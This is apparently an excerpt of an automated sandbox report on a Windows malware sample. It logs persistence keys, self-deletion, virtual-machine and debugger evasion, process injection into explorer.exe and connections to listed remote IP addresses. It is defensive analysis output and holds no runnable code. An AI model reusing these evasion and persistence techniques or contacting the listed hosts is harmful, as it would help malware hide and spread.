    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7950200 LookupPrivilegeValueA,OpenProcessToken,AdjustTokenPrivileges,AdjustTokenPrivileges,7_2_00007FF6A7950200
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02300326 CreateToolhelp32Snapshot,Module32First,0_2_02300326
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tcgcucaJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5587.tmpJump to behavior
    Source: cOm0MmeV34.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: cOm0MmeV34.exeReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Users\user\Desktop\cOm0MmeV34.exe "C:\Users\user\Desktop\cOm0MmeV34.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\tcgcuca C:\Users\user\AppData\Roaming\tcgcuca
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5587.exe C:\Users\user\AppData\Local\Temp\5587.exe
    Source: C:\Users\user\AppData\Local\Temp\5587.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5587.exe "C:\Users\user\AppData\Local\Temp\5587.exe"
    Source: C:\Users\user\AppData\Local\Temp\5587.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5587.exe "C:\Users\user\AppData\Local\Temp\5587.exe"
    Source: C:\Users\user\AppData\Local\Temp\5587.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5587.exe C:\Users\user\AppData\Local\Temp\5587.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5587.exe "C:\Users\user\AppData\Local\Temp\5587.exe" Jump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5587.exe "C:\Users\user\AppData\Local\Temp\5587.exe" Jump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: cOm0MmeV34.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeUnpacked PE file: 0.2.cOm0MmeV34.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.wiwo:R;.jofovub:R;.lawozuz:R;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\tcgcucaUnpacked PE file: 4.2.tcgcuca.400000.0.unpack .text:ER;.rdata:R;.data:W;.wiwo:R;.jofovub:R;.lawozuz:R;.rsrc:R; vs .text:EW;
    Source: cOm0MmeV34.exeStatic PE information: section name: .wiwo
    Source: cOm0MmeV34.exeStatic PE information: section name: .jofovub
    Source: cOm0MmeV34.exeStatic PE information: section name: .lawozuz
    Source: tcgcuca.2.drStatic PE information: section name: .wiwo
    Source: tcgcuca.2.drStatic PE information: section name: .jofovub
    Source: tcgcuca.2.drStatic PE information: section name: .lawozuz
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401CD1 push ecx; ret 0_2_00401CD2
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401C91 push 00000076h; iretd 0_2_00401C93
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00402E96 push B92A2F4Ch; retf 0_2_00402E9B
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02201D38 push ecx; ret 0_2_02201D39
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02201CF8 push 00000076h; iretd 0_2_02201CFA
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02202EFD push B92A2F4Ch; retf 0_2_02202F02
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02305D78 push edx; ret 0_2_02305D79
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02307DF6 push FFFFFFFBh; iretd 0_2_02307E0C
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401CD1 push ecx; ret 4_2_00401CD2
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401C91 push 00000076h; iretd 4_2_00401C93
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00402E96 push B92A2F4Ch; retf 4_2_00402E9B
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_02126C06 push FFFFFFFBh; iretd 4_2_02126C1C
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_02124B88 push edx; ret 4_2_02124B89
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_03CB1CF8 push 00000076h; iretd 4_2_03CB1CFA
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_03CB2EFD push B92A2F4Ch; retf 4_2_03CB2F02
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_03CB1D38 push ecx; ret 4_2_03CB1D39
    Source: cOm0MmeV34.exeStatic PE information: section name: .text entropy: 7.660038630292238
    Source: tcgcuca.2.drStatic PE information: section name: .text entropy: 7.660038630292238
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5587.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tcgcucaJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tcgcucaJump to dropped file

    Boot Survival

    barindex
    Creates autostart registry keys with suspicious names
    Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUYJump to behavior
    Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUYJump to behavior
    Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUYJump to behavior
    Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUYJump to behavior
    Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUYJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Deletes itself after installation
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\com0mmev34.exeJump to behavior
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tcgcuca:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Check for Windows Defender sandbox
    Source: C:\Users\user\AppData\Local\Temp\5587.exeFile Queried: C:\INTERNAL\__emptyJump to behavior
    Checks if the current machine is a virtual machine (disk enumeration)
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Queries memory information (via WMI often done to detect virtual machines)
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
    Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
    Source: C:\Users\user\AppData\Roaming\tcgcucaAPI/Special instruction interceptor: Address: 7FF8C88EE814
    Source: C:\Users\user\AppData\Roaming\tcgcucaAPI/Special instruction interceptor: Address: 7FF8C88ED584
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: tcgcuca, 00000004.00000002.2370891978.000000000210E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: cOm0MmeV34.exe, 00000000.00000002.2144195967.00000000022EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKG
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmnet.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmmouse.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 424Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3463Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 846Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 365Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 354Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1097Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3208Thread sleep time: -346300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2612Thread sleep time: -84600s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 6172Thread sleep time: -36500s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 5776Thread sleep time: -35400s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 6520Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3208Thread sleep time: -109700s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: explorer.exe, 00000002.00000000.2123656424.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2122622275.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 00000002.00000000.2121615024.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
    Source: explorer.exe, 00000002.00000000.2122622275.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
    Source: explorer.exe, 00000002.00000000.2123656424.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000002.00000000.2122622275.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
    Source: explorer.exe, 00000002.00000000.2122622275.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
    Source: explorer.exe, 00000002.00000000.2121615024.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2123656424.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_0220092B mov eax, dword ptr fs:[00000030h]0_2_0220092B
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_02200D90 mov eax, dword ptr fs:[00000030h]0_2_02200D90
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_022FFC03 push dword ptr fs:[00000030h]0_2_022FFC03
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_0211EA13 push dword ptr fs:[00000030h]4_2_0211EA13
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_03CB0D90 mov eax, dword ptr fs:[00000030h]4_2_03CB0D90
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_03CB092B mov eax, dword ptr fs:[00000030h]4_2_03CB092B

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Benign windows process drops PE files
    Source: C:\Windows\explorer.exeFile created: 5587.exe.2.drJump to dropped file
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 186.145.236.93 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
    Allocates memory in foreign processes
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory allocated: C:\Windows\explorer.exe base: 11A0000 protect: page read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory allocated: C:\Windows\explorer.exe base: 30F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory allocated: C:\Windows\explorer.exe base: 3270000 protect: page execute and read and writeJump to behavior
    Changes memory attributes in foreign processes to executable or writable
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory protected: C:\Windows\explorer.exe base: 11A0000 protect: page execute and read and writeJump to behavior
    Creates a thread in another existing process (thread injection)
